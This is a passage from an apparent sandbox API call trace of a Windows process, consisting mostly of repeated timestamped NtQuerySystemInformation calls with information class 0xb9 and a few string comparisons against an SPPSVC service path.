(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdcf0, Length=0x28, ResultLength=0x0) [0228.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb90, Length=0x20, ResultLength=0x0) [0228.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc50, Length=0x20, ResultLength=0x0) [0228.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdbe0, Length=0x20, ResultLength=0x0) [0228.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdbe0, Length=0x20, ResultLength=0x0) [0228.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdec0, Length=0x28, ResultLength=0x0) [0228.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdec0, Length=0x28, ResultLength=0x0) [0228.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x28, ResultLength=0x0) [0228.207] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe080, Length=0x28, ResultLength=0x0) [0228.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x28, ResultLength=0x0) [0228.216] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.222] NtQuerySystemInformation 